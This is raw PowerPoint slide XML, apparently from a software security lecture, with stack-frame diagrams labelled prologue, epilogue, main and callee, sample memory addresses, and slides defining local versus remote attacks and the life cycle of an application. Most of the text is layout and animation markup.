                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="3265291"/>
            <a:ext cx="1756527" cy="830903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Right Bracket 6"/>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8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="5659908"/>
            <a:ext cx="1756527" cy="709842"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Bracket 9"/>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11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="506830"/>
            <a:ext cx="1756527" cy="576903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Bracket 12"/>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14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="2366075"/>
            <a:ext cx="1756527" cy="633380"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Right Bracket 15"/>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17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="794111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6">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>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6">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>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
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>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6">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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6">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="110"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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11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12"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 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62084" y="305096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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991529" y="5377554"/>
            <a:ext cx="165295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991529" y="6125240"/>
            <a:ext cx="165295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1991529" y="5727526"/>
            <a:ext cx="1652954" cy="23111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4023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xEl>
                                              <p:pRg st="16" end="1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7">
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>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7">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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7">
                                            <p:txEl>
                                              <p:pRg st="19" end="1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7">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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7">
                                            <p:txEl>
                                              <p:pRg st="23" end="23"/>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7">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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17">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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7">
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>
                                            </p:txEl>
                                          </p:spTgt>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17">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>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7"/>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8"/>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5"/>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11"/>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6"/>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9"/>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xit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>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18"/>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xit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="123" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>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p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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77</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62084" y="305096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6" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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337382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0"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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a: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78</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62084" y="305096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02325265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79</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67044" y="331614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758344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Remote vs. Local Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through local interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require a previously-established presence on the host (e.g., an account, or another application under the control of the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with privileges that are different (usually superior) from the ones that the attacker would otherwise have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general these attacks are easier to perform, because the attacker has a better knowledge of the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through network-based interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthenticated remote attacks: Interaction with the application does not require authentication or prior capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with the privileges of the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, are more difficult to perform but they do not require prior access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92486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80</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0xfd2c0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0x80483a6</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67044" y="331614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7579336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81</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0x80483a6</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67044" y="331614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76910454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82</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66374" y="359046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42897829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83</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0x80483a8</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66374" y="3590461"/>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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1528546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84</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0x80483ab</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30468" y="38700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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2074076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85</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0x80483ab</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30468" y="38700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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="105650524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86</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0x80483b3</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30468" y="415531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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128890974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87</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0x80483b3</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30468" y="415531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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103845289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88</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0xfd2b8</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0x80483ba</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38942" y="442963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284355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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67813986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89</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0x80483ba</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38942" y="442963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320931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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="801046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The Life of an Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Author writes code in high-level language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is translated in some executable form and saved to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpretation vs. compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application terminates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71904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90</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8" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4538942" y="4429632"/>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320931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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61937448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91</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0xfd2b4</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320931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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="6166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973749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92</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77571" y="3209316"/>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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="6166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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1977296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93</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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="6166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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11470375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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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94</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0x8048394</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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="616663"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153312850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95</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0xfd2d0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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="87269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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178198682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96</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0x8048395</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20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="642900"/>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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="872695"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="104569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97</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0x8048397</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18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="115615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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21193829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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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98</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0x8048397</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="306534"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Right Bracket 22"/>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24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>main</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-15555" y="2157984"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Bracket 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="non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n w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="115615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158592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479672" y="303902"/>
          <a:ext cx="2831284" cy="3657600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2831284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
